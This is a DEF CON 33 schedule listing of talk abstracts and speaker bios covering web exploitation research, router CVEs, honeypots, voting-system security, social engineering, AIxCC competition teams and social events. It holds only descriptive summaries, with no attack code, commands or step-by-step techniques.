- ics Calendar file
Love stickers? Curious how they're made? Wonder about the privacy implications? Make some stickers or trade after this talk!
SpeakerBio: Avi ZajacAvi loves rabbits, cheesecake, and cute things
- ics Calendar file
What is it actually like to support and balance a global anonymity network, with users ranging from political dissidents to national security analysts? You say it's important to teach law enforcement and governments about privacy and end-to-end encryption, but how do those conversations go in practice? I heard you accidentally got Russia to block all of Azure for a day? Are you ever going to do a Tor talk in China? Wait, who exactly tried to bribe you to leave bugs in Tor to support their criminal schemes?
Historically I've tried to downplay some of the excitement from operating the Tor network and teaching the world about Tor, but this year I'm going to try my hand at the "war stories" track.
References:
Roger Dingledine is co-founder and original developer of the Tor Project, a nonprofit that develops free and open source software to protect people from tracking, censorship, and surveillance online. Roger works with journalists and activists on many continents to help them understand and defend against the threats they face, and he is a lead researcher in the online anonymity field. EFF picked him for a Pioneer Award, and Foreign Policy magazine chose him as one of its top 100 global thinkers.
- ics Calendar file
- ics Calendar file
Modern websites have evolved into complex, layered network architectures—creating fertile ground for serious protocol-level vulnerabilities that traditional tools often overlook. As web applications continue growing in complexity, critical vulnerabilities such as HTTP smuggling, first-request routing, and cache poisoning/deception become increasingly prevalent, underscoring the need for tooling that treats HTTP as it truly is: a stream-based protocol.
Although security professionals commonly rely on HTTP proxies to intercept, analyze, and manipulate traffic, most current solutions obscure the stream-oriented nature of the protocol. By presenting HTTP interactions merely as isolated request-response transactions, crucial details—like persistent connections, pipelining, and geo-routing—are concealed, making it difficult to fully comprehend data flows or uncover advanced attack vectors.
In this session, I’ll present a new Burp extension to dive deep into the raw streams powering HTTP, turning overlooked details into powerful exploits. You’ll learn how to spot hidden proxies, exploit subtle errors to desynchronize connections, hijack requests, and uncover vulnerabilities that evade traditional tools. Through real-world case studies, I’ll reveal exactly how you can chain advanced HTTP Desync attacks to secure bounties that others have left behind—transforming complex network architectures into your own bug bounty playground!
SpeakerBio: Martin "tincho_508" Doyhenard, Security Researcher at PortSwiggerMartin is a Security Researcher at PortSwigger with over 10 years of experience specializing in web security and reverse engineering. Renowned for presenting multiples groundbreaking researches at premier conferences like Black Hat, DEFCON and RSA. Active participant in Capture The Flag (CTF) competitions and bug bounty programs, consistently uncovering critical vulnerabilities and driving innovation in cybersecurity.
- ics Calendar file
We all know that Business Continuity and Disaster Recovery are vitally important to every organization - but what about individuals? Explore how to protect yourself and your loved ones through ever-growing data mining, PII breaches, and socio-political upheaval with best practice BCDR techniques.
SpeakerBio: Rebecah MillerRebecah is a Business Continuity & Disaster Recovery consultant, creating and testing continuity and resilience plans across all organizational sectors. After working through a disaster at a company that was not prepared, she changed careers to focus on security and risk management in an effort to improve the resiliency of others.
- ics Calendar file
Traditional detection methods struggle to keep pace with evolving attacker tactics in cloud environments like Microsoft 365. To level the playing field, organizations can implement honeypots and honey tokens strategically within their M365 infrastructure, turning the complexity of cloud services to their advantage. By creating deliberately enticing yet closely monitored decoys, defenders can proactively detect attacker reconnaissance and exploitation attempts.
This session outlines effective strategies for deploying M365 honeypots and honey tokens, emphasizing low false-positive rates and high data quality. Leveraging Exchange, SharePoint, Teams, and Application-specific tokens, attendees will learn to craft attractive, attacker-oriented traps integrated seamlessly into their security monitoring pipelines. Advanced deception techniques, including breadcrumb trails leading adversaries into highly monitored secondary environments, will also be discussed.
Through live demonstrations, participants will gain valuable insights into how deception techniques can be applied within Microsoft 365 environments. They will learn how to design and implement these strategies in their own environments to strengthen detection capabilities against sophisticated adversaries.
This presentation is the culmination of extensive hands-on research and practical application in both penetration testing and defensive detection engineering. By leveraging actual techniques observed in real-world attacks, this talk bridges offensive innovation with proactive defensive strategies. Attendees will receive detailed methodologies to effectively set up, deploy, and monitor M365-specific honeypots.
SpeakerBio: Ryan O'DonnellRyan O'Donnell is a Senior Offensive Security Engineer at Microsoft. Over the last 13+ years, he's been performing Penetration Tests, Red Team assessments, and Incident Response investigations. Ryan has conducted hands-on workshops at Hack Space Con, Hack Red Con, BSides Las Vegas, and BSides NoVa. Ryan has a Masters in Cybersecurity from GMU and the following certifications: OSCP, OSEP, CRTO, and GREM.
- ics Calendar file
When the mission is launch-critical, time becomes a tactical asset. In this session, you'll learn how Defense Unicorns' Unicorn Delivery Service and NixOS work in unison to deliver secure, fully declarative software—on-prem or in disconnected, degraded, intermittent, and limited environments—in less than 24 hours.
What began with a record-breaking delivery for the U.S. Space Force at Cape Canaveral evolved into a new paradigm of software delivery that spread department-wide like wildfire. Operational timelines of critical-software used by warfighters is no longer measured in weeks or even days: it's hours, and soon to be minutes.
Join us to see how "T-Minus 24 Hours" isn't aspirational—it's operational. Learn how this approach is transforming the way we deliver trusted, resilient software to the warfighter at mission speed.
SpeakerBio: Antonio EscaleraAntonio is a highly accomplished Senior Platform Engineer with over a decade of experience in the design, development, and implementation of innovative platform architectures. Having worked with some of the largest defense, financial services, research, and retail organizations in the United States, he is an expert in creating robust, scalable, and secure solutions tailored to the unique needs of his clients. Antonio's deep technical knowledge is complemented by his exceptional communication and collaboration skills. He is adept at fostering strong relationships with cross-functional teams and external stakeholders.
- ics Calendar file
You just arrived in some city where the enemy is active. You have a mission to locate and identify a hostile team. They operate in and around a hotel adjacent to friendly force headquarters. They use radios to talk, rented cars to move, local Wi-Fi to conduct operations, and Bluetooth for everything else. Your phone just buzzed with a message that screams "They're planning something today. You have one hour to find them so we can direct local law enforcement. Go!" You just realised your equipment bag never made it off the plane. Bad. There is nowhere nearby to get what you need to do RF work in one hour. Worse. You happened to stuff your Flipper Zero into your pocket. Good? It's what you have and it can work on all that enemy tech--let's power it up and get at the mission. Better than nothing, right? Go!
SpeakerBio: Grey FoxGrey Fox is a U.S. military veteran with 20 years experience in digital network intelligence, cyberspace warfare, and digital defense tactics. Having deployed multiple times supporting front line combat teams, his experience ranges from offensive cyber operations planning and execution to military information support operations. Grey Fox currently teaches Digital OPSEC, SDR foundations, and Wi-Fi hacking to both civilian and military groups. He has presented at DEFCON, several B-Sides, and other cons in addition to chairing panels on consumer data privacy for Federal research and accountability. When not seeking some free time, Grey Fox is seeking your wireless signals for fun and profit.
- ics Calendar file
🛰️⚡ Can you keep Taiwan connected?
Come play Taiwan Digital Blockade Lite at the Maritime Hacking Village @ DEF CON 33 — a fast-paced attacker-defender wargame adapted from a US Naval War College scenario.
🎲 In a 25-30 minute dice game, you’ll face off over Taiwan’s vulnerable critical infrastructure: communications cables, power grids, satellite links.
One side launches cyberattacks, sabotage, and electronic warfare to shut it all down. The other scrambles to keep the lights and the data on.
Whether you are a seasoned ICS practitioner, or a complete noob, the game is fun, fast, and thought provoking.
SpeakerBio: Jason Vogt, USNWCJason Vogt is an assistant professor in the Strategic and Operational Research Department, Center for Naval Warfare Studies at the United States Naval War College. Professor Vogt is a cyber warfare and wargaming expert. He has participated in the development of multiple wargames at the United States Naval War College. He previously served on active duty as an Army officer.
- ics Calendar file
🛰️⚡ Can you keep Taiwan connected?
Come play Taiwan Digital Blockade Lite at the Maritime Hacking Village @ DEF CON 33 — a fast-paced attacker-defender wargame adapted from a US Naval War College scenario.
🎲 In a 25-30 minute dice game, you’ll face off over Taiwan’s vulnerable critical infrastructure: communications cables, power grids, satellite links.
One side launches cyberattacks, sabotage, and electronic warfare to shut it all down. The other scrambles to keep the lights and the data on.
Whether you are a seasoned ICS practitioner, or a complete noob, the game is fun, fast, and thought provoking.
SpeakerBio: Jason Vogt, USNWCJason Vogt is an assistant professor in the Strategic and Operational Research Department, Center for Naval Warfare Studies at the United States Naval War College. Professor Vogt is a cyber warfare and wargaming expert. He has participated in the development of multiple wargames at the United States Naval War College. He previously served on active duty as an Army officer.
- ics Calendar file
In this presentation we will discuss real-world examples of cybersecurity issues with ATMs. Ever wondered what it takes to make an ATM spew out cash? You’ll hear some war stories from Fredriks career when penetration testing ATMs, which includes the technical aspects of ATM hacking like tools but also troubles that can arise when trying to set up an ATM test.
SpeakerBio: Fredrik Sandström, Head of Cyber Security at BasaltFredrik Sandström, M.Sc. is Head of Cyber Security at Basalt, based in Stockholm, Sweden. He has nearly a decade of experience in penetration testing, alongside a background in software development and embedded systems engineering. His early work includes software development for organizations such as the Swedish Defence Research Agency (FOI).
Since 2015, Fredrik has focused on delivering advanced security assessments—including penetration testing, red teaming, and threat emulation—for clients in diverse sectors such as banking, insurance, automotive, energy, communications, and IT services. He holds multiple industry-recognized certifications, including GXPN (GIAC Exploit Researcher and Advanced Penetration Tester), GCPN (GIAC Cloud Penetration Tester), GRTP (GIAC Red Team Professional), and HTB Certified Bug Bounty Hunter (CBBH).
Fredrik is also an active contributor to the security community. He has presented at major conferences such as SEC-T—Sweden’s leading offensive security conference—and DevCon in Bucharest, Romania, a key event for developers and IT professionals in Eastern Europe.
- ics Calendar file
Attendees will get hands on with some AI pen testing techniques as based on the Instructor’s experiences from the NIST AI Pen Test Framework Challenge and industry best practices.
SpeakerBio: Lee McWhorterLee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.
- ics Calendar file
What happens when you gather 4 hackers together to complete silly tasks, rank their execution, and see who ends up with the most points at the end? Taskmooster, that’s what. Inspired by the UK game show Taskmaster, TaskMooster is brings lateral thinking, comedic tasks, and general shenanigans to DEF CON. What? You haven’t heard of Taskmaster? Seriously, stop reading this program right now and go watch at least one episode. All seasons are available to stream on YouTube, and it’s totally binge-worthy.
Come join the contestants as they see how they performed for each task and get graded by our very own TaskMooster. The winner gets to take home the coveted Golden Telephone and bragging rights for being the TaskMooster champion.
The participants are selected in advance. We will film the pre-con tasks in Maryland several months before DEF CON and then will convene on stage at DEF CON in August for the live event.
None
- ics Calendar file
In this talk, Team Atlanta will share their key experiences and insights from participating in DARPA's AIxCC competition. They'll highlight theirtechnical approach to leveraging AI systems—particularly large language models—to identify and remediate software vulnerabilities. The goal is to distill what worked, what didn’t, and what surprised us, offering practical takeaways for researchers and practitioners working with LLMs in security contexts. By reflecting on the challenges and opportunities we encountered, they hope to contribute to the broader conversation on developing AI-first tools to help secure critical infrastructure in the years ahead.
SpeakerBio: Taesoo Kim, Professor at Georgia Tech
- ics Calendar file
Ink your vibe, temporarily. Choose from hacker and privacy-themed designs and apply them on the spot with our DIY tattoo station. Fun, expressive, and perfect for selfies, this bar lets you wear your identity proudly without a lifetime commitment.
- ics Calendar file
Cloud misconfigurations often create unexpected attack vectors, exposing sensitive resources and allowing attackers to escalate privileges or gain unauthorized access. In this session, we’ll explore common security misconfigurations in Tencent Cloud using TencentGoat, an intentionally vulnerable cloud environment designed for hands-on learning.
We’ll explore how these misconfigurations typically occur, how TencentCloud might unintentionally leave security gaps, and how attackers exploit these weaknesses using well-known cloud attack techniques.
SpeakerBio: Muhammad Yuga NugrahaMuhammad Yuga Nugraha is an experienced DevSecOps engineer at Practical DevSecOps, specializing in research and development in areas such as DevSecOps, Cloud Security, and Cloud Native Security. He has co-authored notable certifications like the Certified Container Security Expert (CCSE), Certified Cloud Native Security Expert (CCNSE), and Certified Software Supply Chain Expert (CSSE).
Yuga frequently speaks at industry events including PyCon (APAC 2024, SG 2025), AWS Community Day Indonesia 2024, KCD Indonesia 2024 and delivers training sessions for government bodies and telecom companies. Additionally, he holds certifications including CDP (Certified DevSecOps Professional), and becoming a Kubestronaut.
- ics Calendar file
Designed for wireless security testing and autonomous reconnaissance, Tengu Marauder v2 is a multi-terrain open-source robotic platform. Built around a Raspberry Pi and using ROS2, it combines real-time motor control, RF monitoring, and sensor data streaming to facilitate remote operations in challenging environments. Over the initial architecture, the v2 platform brings major enhancements in system modularity, communication security, and operational flexibility. Designed for safe remote access using encrypted VPN tunnels, the robot allows internet-based control and telemetry without endangering the system to direct network threats. Tengu Marauder v2 provides a tough, scalable basis for incorporating autonomy and cyber capabilities into your mobile security toolset whether used for off-grid automation, robotics teaching, or red teaming.
Speakers:Lexie "L3xic0n" Thach,Munir MuhammadLexie has worked in cybersecurity for ten years in various positions. During this time, she developed a strong affinity for electrical engineering, programming, and robotics engineering. Despite not having a traditional academic background, she has extensive hands-on experience from her eight years in the US Air Force, specializing in cybersecurity and tactical networks for aircraft missions and operations. Her focus on securing and testing the security of autonomous systems stems from these experiences, and she is passionate about sharing the techniques she has learned. She currently runs a local hackerspace in Philadelphia in support of DC215 called the Ex Machina Parlor where anyone can come to learn new hacking tools, try to build offensive or defensive security robots, and use 3D printers on standby for any prototyping people want.
SpeakerBio: Munir MuhammadMunir is a cybersecurity intern with the City of Philadelphia and a senior in college. He’s focused on learning how to keep computer systems safe from threats. He is especially interested in defensive security and enjoys finding new ways to protect networks and data. He is active in local tech meetups, works on open-source security projects, and is a member and community engagement coordinator at EMP (Ex Machina Parlor), a Philadelphia hackerspace where people can explore new hacking tools, build security robots, and use 3D printers for prototyping. He also supports students as a teaching assistant for software engineering courses. He is looking forward to meeting new people at DEF CON, learning from the community, and helping newcomers find their way into cybersecurity.
- ics Calendar file
The presentation will describe SIFT's LACROSSE Cyber Reasoning system, which coordinates hundreds of agents to automatically find and fix vulnerabilities in real-world software packages. Combining the advantages of Large Language Models (LLMs) with symbolic reasoning, fuzz testing, and other software analysis methods, LACROSSE is competing in the Final round of the DARPA AIxCC contest. A consistent theme through all our work on LACROSSE is testing, testing, testing.
Speakers:Dr. David Musliner,Dr. Matt McLure
- ics Calendar file
Physical security has long been a core component of voting system defenses through the use of keyed locks and tamper-evident seals/tape/stickers. With procedural protections requiring their use, arbitrary voters are explicitly permitted to physically interact with these systems in a semi-private setting (voting booth) under the assumption that the hardware’s attack surface can be sufficiently- scoped to a set of intended, known-safe interactions (i.e. limit/prevent access to I/O interfaces, administrative controls, storage devices, etc.). Some have even cited these specific defenses as pre-existing and sufficient mitigations for vulnerabilities in already-deployed voting system such that further remediation is not needed. Unfortunately, this assumption does not hold under scrutiny. A review of publicly available sources from vendors, jurisdictions, and assorted other entities reveals substantial weaknesses in the design, configuration, and deployment of such defensive devices. In addition to recovering/matching voting system keys from depictions specific to more than half of U.S. states, their identity, ease of acquisition, and apparent default/universal configuration bodes poorly even for states without depictions sufficient to recover/match. Though less definitive, analogous concerns were found related to tamper-evident devices in design, selection, composition, and application such that reliance on their detective capabilities is uncertain at best. With near-identical issues affecting voting systems across vendors, products, and jurisdictions documented across more than a decade’s worth of sources, the systemic failure of design, certification, and testing is readily apparent. While changes in the VVSG 2.0 standard serve as direct mprovements, they continue to leave predictable weaknesses lying in wait for future elections.
SpeakerBio: Drew Springall, Auburn UniversityDrew Springall is an Assistant Professor of Computer Science at Auburn University, and is a hacker/security researcher with a focus on the technical/concrete aspects of voting system security. Since 2013, Drew has worked to understand and demonstrate the difficulty attackers would face should they attempt to attack such systems as deployed in the real-world and given realistic resources to leverage. Most recently, Drew has worked specifically on the DVSorder ballot randomization flaw and the ”Security Analysis of Georgia’s ImageCast X Ballot Marking Devices” report published along with Prof. J. Alex Halderman.
- ics Calendar file
The Pwnies are an annual awards ceremony celebrating and making fun of the achievements and failures of security researchers and the wider security community. Every year, members of the infosec community nominate the best research and exploits they’ve seen. The Pwnie Award nominations are judged by a panel of respected security researchers and former pwnie award recipients – the closest to a jury of peers a hacker is likely to ever get. At this event DEF CON attendees will get a first person look at some of the most groundbreaking research and hacks in the cyber security community of the past year, and the winners get some well deserved recognition from the broader community for the great work they’ve done.
Speakers:Ian Roos,Mark Trumpbour
- ics Calendar file
A deep dive into the realities of cybercrime across Africa, with a focus on understanding—not just condemning—the digital hustler phenomenon. Drawing from the work of GoLegit Africa, a pioneering initiative focused on cybercrime rehabilitation and skills development, this session explores how economic hardship, digital opportunity, and social pressures intersect to fuel a growing underground cyber economy.
We’ll examine real-world tactics used by African cybercriminals—from phishing rings and business email compromise to deepfake scams and online fraud—and explore how these "playbooks" are learned, refined, and shared. Through case studies and field insights, the presentation reveals how some youths see cybercrime not as deviance, but as digital entrepreneurship in the absence of alternatives.
This talk goes beyond exposure; it introduces GoLegit’s model for intervention—using mentorship, ethical hacking training, and reintegration pathways to turn cyber skills toward positive outcomes. It’s a session for those interested in threat intelligence, socio-economic roots of cybercrime, and how community-led solutions can help disrupt the pipeline from poverty to online criminality.
SpeakerBio: Remi AfonRemi Afon is a results-driven Cybersecurity Consultant with deep expertise across AI/ML Security, Cloud Security, DevSecOps, and emerging DevSecAI practices. He has a proven track record of designing and implementing secure, scalable solutions in high-stakes IT and financial environments. Recognized for driving secure-by-design initiatives using modern cloud platforms (AWS, Azure, GCP) and DevSecOps toolchains (Docker, Kubernetes, Jenkins, GitHub Actions), Remi emphasizes automating security across the SDLC and integrating AI/ML into security workflows. He is known for solving complex challenges, aligning security with business goals, and optimizing processes to reduce risk, improve efficiency, and build long-term trust.
- ics Calendar file
This talk is a postmortem of a well-intentioned but ultimately failed Application Security program -- led by a solo AppSec engineer who tried to do everything, too fast, without consensus. It’s not a case study in success. It’s a breakdown of how security can go wrong even when the ideas are sound, the tooling is industry-standard, and the motivation is genuine.
SpeakerBio: Thomas JostWrites code. Builds security programs. Lights fires, and talks so you don't have to.
- ics Calendar file
After years of planning and development, the highly anticipated new version of rs0n's bug bounty hunting framework is ready to go! Aptly named The Ars0n Framework v2, this tool is specifically designed to help eliminate the friction for aspiring bug bounty hunters. This tool not only automates the most commonly used bug bounty hunting workflows but each section includes detailed lessons that help beginners understand the ""Why?"" behind the methodology. Finally (and perhaps most exciting of all), reports generated from the data collected provide the user with guidance at critical decision points based on rs0n's many years of bug bounty hunting experience. Simply put, this tool is designed to help beginners compete w/ the pros on Day 1, and the best part is it's absolutely FREE!
In this talk, rs0n will go into extensive detail about how the tool works, what changes were made from version 1, how to use (and troubleshoot) the framework, ways of engaging with the community, and much more! The goal is to provide the audience with all the information they need to start using the tool today. If you are someone who is excited to start Bug Bounty Hunting but don't know where to start, we would love the opportunity to try and help!
SpeakerBio: Harrison "rs0n" RichardsonHarrison Richardson (rs0n) began his Cybersecurity career in the US Army as a 25B. After leaving the service, Harrison worked various contract and freelance jobs while completing his Masters in Cybersecurity from the University of Dallas. Harrison's first full-time job in the civilian sector was at Rapid7, where he worked as a senior security solutions engineer as part of their Applied Engineering Team. Today, Harrison works as a product security engineer coving web applications, cloud, and AI systems. In his free time, Harrison develops a wide range of open-source tools and works to provide educational content to the bug bounty community through YouTube & Twitch.
- ics Calendar file
Last year on the AIxCC Stage, The Open Source Program Office (OSPO) at CMS.gov shared the programs, policies, and projects we were building to identify and mitigate continuity and security risks in the software supply chain across the Federal Ecosystem. This year, we will be sharing stories from another historic first: Launching our first Bug Bounty! Come hear from the Bug Bounty organizers (and special guests) about implementation details, lessons learned, and an Open QnA.
Speakers:Remy DeCausemaker,Keith Busby,Leah Siskind,Casey Ellis,ZwinKKeith Busby is the Acting Chief Information Security Officer at the Centers for Medicare and Medicaid Services (CMS), where he leads enterprise cybersecurity, compliance, privacy, policy, and counterintelligence efforts. With over 20 years in IT and security; including leadership roles in cyber threat operations and compliance, he brings a mission-driven approach to modernizing and securing federal systems at scale. Keith’s roots in security run deep: from his time as a U.S. Army veteran to his work securing one of the nation’s largest school districts. He holds a B.S. in Computing and Security Technologies from Drexel University and a M.S. in Cybersecurity and Information Security from Capitol Technology University. Outside of work, Keith is a self-declared participation trophy-winning backyard BBQ pitmaster and a dedicated youth baseball coach. He thrives at the intersection of public service, technical leadership, and dad jokes.
SpeakerBio: Leah Siskind, Center on Cyber and Technology InnovationLeah Siskind is an AI artificial intelligence (AI) research fellow at the Center on Cyber and Technology Innovation at the Foundation for Defense of Democracies. At CCTI, her research focuses on the adversarial use of AI by state and non-state actors — including Iran, China, Russia, North Korea — targeting the United States and its allies. Previously Leah served as the deputy director of the AI Corps at the U.S. Department of Homeland Security. She previously spent four years with the U.S. Digital Service in the White House, where she led efforts to modernize government technology. Her private sector experience includes roles at data and analytics companies such as Palantir and Uptake. Earlier in her career, she worked in diplomacy as a representative of Israel’s Foreign Ministry, leading government affairs at the consulate in the Pacific Northwest.
SpeakerBio: Casey Ellis, Founder and Chairperson at BugcrowdCasey is a serial entrepreneur and executive, best known as the founder of Bugcrowd and co-founder of The disclose.io Project. He is a 25+ year veteran of information security who grew up inventing things and generally getting technology to do things it isn't supposed to do. Casey pioneered the crowdsourced security as-a-service model, launching the first bug bounty programs on the Bugcrowd platform in 2012, and co-founded the disclose.io vulnerability disclosure standardization project in 2014 prior to its launch in 2018. He’s an active member of a variety of policy and threat intelligence working groups and think tanks such as the Cyber Threat Intelligence League, w00w00, Hacking Policy Council, and the Election Security Research Forum. He has personally advised the US White House, DoD, Department of Justice, Department of Homeland Security/CISA, the Australian and UK intelligence communities, and various US House and Senate legislative cybersecurity initiatives, including preemptive cyberspace protection ahead of the 2020 Presidential Elections, the US National Cyber Strategy, and a variety of policies and EO’s relating to security research, anti-hacking law, and artificial intelligence. Casey, a native of Sydney, Australia, is based in the San Francisco Bay Area.
SpeakerBio: ZwinK, Hacker at BugcrowdZwinK is a renowned ethical hacker and cybersecurity expert with decades of experience in identifying critical vulnerabilities in web mobile applications. Specializing in broken access control (BAC) bugs and often known as “the IDOR guy”, he has established a formidable reputation through meticulous manual penetration testing of digital services and platforms worldwide.
With an impressive track record, ZwinK has logged over 1,300 bugs on the Bugcrowd platform in only four years, showcasing his ability to uncover vulnerabilities. This expertise has earned him the #1 rank in the United States and 9th place globally on the Bugcrowd platform for high/critical impact bugs, a testament to his skill and dedication in the field of ethical hacking. He also holds the first place position on programs hosted by industry giants such as T-Mobile and State Farm.
His work has significantly bolstered the security posture of these organizations, protecting sensitive data and ensuring robust defenses against cyber threats. ZwinK continues to push the boundaries of ethical hacking, and has recently taken to working on federal government programs, such as CMS (“Centers for Medicare & Medicaid Services”). He also loves educating and inspiring the next generation of cybersecurity professionals.
- ics Calendar file
- ics Calendar file
(DCNextGen is for youth 8-18 attending DEF CON) How a group of students in Brazil started hunting real-world vulnerabilities in open-source projects – and how you can too. This talk shares our journey, how we began making an impact in our local community, and how that impact is now reaching the world.
SpeakerBio: Natan Morette, Senior Cyber Security AnalystNatan Morette is a Senior Cyber Security Analyst with over 15 years of experience in technology, specializing in Vulnerability Management, Attack Surface and Exposure Management, Endpoint Protection, Penetration Testing (PenTesting), Internal Network Security Assessments, Microsoft 365, Information Security Frameworks, Network Administration, Microsoft/Linux Server solutions, and Cloud Security Administration (GCP, Azure).
- ics Calendar file
Join in on the official DEF CON Pool Party for Food, Drinks, and Music!
- ics Calendar file
Watched the vishing competition and caught the bug? Welcome to the world of social engineering! Now let's turn that adrenaline into action. In this talk, I'm handing over the knowledge and worksheet that I use to plan my vishing calls, complete with pretext ideas, vishing tips and the kinds of pushback you might encounter on your calls. We'll dive into the art of social engineering over the phone. You'll learn how to build believable pretexts and what makes a voice sound trustworthy. I'll give you what you need to be ready to pick up the phone. You'll leave with everything you need, except a burner phone. And unlike Miranda Priestly, your targets won't even see you coming.
SpeakerBio: CronkittenCronkitten (they/them) is a cybersecurity professional, threat hunter, vishing competitor and relentless advocate for ethical social engineering. As a returning vishing competition contender Cronkitten thrives in the booth and on the phone. When they're not building new tools in the SOC, they're crafting pretexts, coaching newcomers, and teaching others how to dial with confidence, charisma and just the right amount of chaos (Ok, it's a lot of chaos, but the good kind). Equal parts charm and strategy, Cronkitten brings a hacker's mindset and a people-first approach to every call. Cronkitten says make that call, embrace the chaos and live in the meow-ment.
- ics Calendar file
Diana Initiative is excited to offer up a "Quiet Room". This room is a library vibes environment where people can calm down or recharge before going back out to experience more DEF CON, or even safely have a meltdown, stim, and take time to recenter. In our library area we will have fidget toys, coloring pages and more.
- ics Calendar file
DOM Clobbering is a type of code-reuse attack on the web that exploits naming collisions between DOM elements and JavaScript variables for malicious consequences, such as Cross-site Scripting.
In this talk, we present a novel systematization of DOM Clobbering exploitation in four stages, integrating existing techniques while introducing new clobbering primitives. Based on this foundation, we introduce Hulk, the first dynamic analysis tool to automatically detect DOM Clobbering gadgets and generate working exploits end-to-end.
Our evaluation revealed an alarming prevalence of DOM Clobbering vulnerabilities across the web ecosystem. We discovered 497 zero-day DOM Clobbering gadgets in the Tranco Top 5,000 sites, affecting popular client-side libraries, including Google Client API, Webpack, Vite, Rollup, and Astro—all of which have since acknowledged and patched the issue.
To complete our exploitation chain, we further study its trigger---HTML Injection vulnerability. Our systematic analysis of HTML Injection uncovered over 200 websites vulnerable to HTML injection. By combining them with our discovered gadgets, we demonstrated complete attack chains in popular applications like Jupyter Notebook/JupyterLab, HackMD.io, and Canvas LMS. This research has resulted in 19 CVE identifiers being assigned to date.
Speakers:Zhengyu Liu,Jianjia YuZhengyu Liu is a Ph.D. student in Computer Science at Johns Hopkins University, advised by Prof. Yinzhi Cao. His research focuses on Web Security, with an emphasis on systematic vulnerability study through automated program analysis techniques, including static/dynamic analysis, and LLM-integrated approaches. His first-author work has been published in top-tier venues such as IEEE S&P 2024 and USENIX Security 2025, and has received the Best Student Paper Award at ICICS 2022. His research has led to the discovery of many zero-day vulnerabilities in widely used software such as Azure CLI, Google Client API Library, and Jupyter Notebook/JupyterLab, resulting in over 30 CVEs in popular open-source projects (>1K Stars in Github) and acknowledgments from Microsoft, Google, Meta, and Ant Group.
SpeakerBio: Jianjia YuJianjia Yu is a PhD student at Johns Hopkins University. Her research focuses on the security and privacy of web and mobile applications, using program analysis. She received a Distinguished Paper Award at CCS 2023 for her work on browser extension vulnerabilities.
- ics Calendar file
How do you turn trash into gold?
How do you build a hacking lab and hacking skillset with no budget?
Why aren’t you popping tags and hacking all the things?
Join DCG (215) Philadelphia’s Lazlo and Syngularity for a trip down memory lane with old devices, new exploits, and a lot of Living off the Lan(d).
Go birds.
- ics Calendar file
In today's hyper-connected world, one vulnerability remains reliably exploitable: the human. Social engineering -- the manipulation of people to gain unauthorized access or extract sensitive information -- continues to outpace technical exploits in both effectiveness and stealth. But in the age of AI, these attacks are evolving faster, becoming more scalable, convincing, and harder to detect.
This talk explores the many faces of modern social engineering: from classic phishing, vishing, and physical intrusion, to AI-generated phishing emails, deepfake voice calls, and synthetic identities crafted by language models. We'll walk through real-world scenarios where attackers exploit trust, urgency, charm, and emotion—now enhanced by tools that can replicate human tone, write believable pretexts, and automate reconnaissance at scale.
You'll leave with a deeper understanding of how AI is supercharging social engineering, what this means for defenders and red teamers alike, and how to recognize the increasingly subtle cues of human-targeted compromise.
SpeakerBio: fir3d0gDavid has spent nearly 2 decades in cybersecurity, transitioning from systems and network administration to offensive security. He has successfully breached banks, law firms, government facilities, and more, all over the globe. David speaks at conferences nationwide, sharing knowledge and humorous stories. Prior to his career in cybersecurity, he served in the U.S. Army, including a tour in Iraq.
- ics Calendar file
The Illuminati Party is excited to open our doors once again to all those who wish to join us at DEF CON for an OPEN party welcoming all of our Hacker Family!
- ics Calendar file
Step into The Jasmine Dragon, an exclusive underground gathering where tradition meets the digital age, and the beat flows like perfectly executed code. With DJ Iroh dropping martial arts-inspired hip-hop, expect deep cuts, heavy bass, and an atmosphere that fuses cyberpunk aesthetics with ancient strategy. This isn’t just a party—it’s a cipher, a meeting of minds where warriors and tacticians alike can connect, scheme, and unwind. But entry isn’t for just anyone; only those who hold the right Pai Sho tile will unlock the door to this hidden node.
- ics Calendar file
Draytek routers are widely deployed edge devices trusted by thousands of organizations, and therefore remain a high-value target for attackers. Building on our prior DEFCON32 HHV presentation (https://www.youtube.com/watch?v=BiBMsw0N_mQ) on backdooring these devices, where we also exposed six vulnerabilities and released Draytek Arsenal (https://github.com/infobyte/draytek-arsenal), a toolkit to analyze Draytek firmware. We return with two new unauthenticated RCEs: CVE-2024-51138, a buffer overflow in STUN CGI handling, and CVE-2024-51139, an integer overflow in CGI parsing. When chained with our prior persistence techniques, these bugs enable a full device takeover and backdoor from the internet.
This talk provides an in-depth analysis of the new vulnerabilities and their exploitation strategies with demos and the full end-to-end exploitation chain. We’ll also explore their potential link to the mass Draytek reboot incidents of March 2025, suggesting that real-world exploitation of some of these vulnerabilities may already be underway. Attendees will gain insight into edge device exploitation, persistent compromise, and the importance of transparency and tooling in embedded security research.
Speakers:Octavio Gianatiempo,Gaston Aznarez
- ics Calendar file
Inspired by the cult following of the Nintendo Power Glove, this talk explores an unconventional use as a presentation remote. Using a generic ESP32 dev board and basic C code, it becomes a Bluetooth keyboard controlling presentations with ease. In fact, I will deliver this talk using the same Power Glove.
In this beginner-friendly talk, I'll share my experience ""hacking"" the Nintendo Entertainment System (NES) accessory. I'll cover:
Attendees will learn how to replicate this project and add pizzazz to their presentations. I'll release the code, so you can spice up your own talks. Maybe you'll even use the Power Glove to pop a shell on a remote machine in your next Proof of Concept.
Note: This is a personal project developed independently and is not affiliated with or endorsed by Microsoft, Nintendo, or any other employer.
SpeakerBio: Parsia "CryptoGangsta" Hakimian, Offensive Security Engineer at MicrosoftParsia is an offensive security "engineer" at Microsoft. While not a full-time hunter, he has learned a great deal from hunts and the bug bounty community. He spends most of his time reading code and experimenting with static and dynamic analysis -- but wishing he was gaming.
Parsia has previously presented at DEF CON's main venue and the AppSec Village. When not breaking (or fixing) things, he plays videogames, D&D, spends time with family outside - and, as his wife jokes, "subjects himself to the tax and immigration systems of US and Canada".
- ics Calendar file
- ics Calendar file
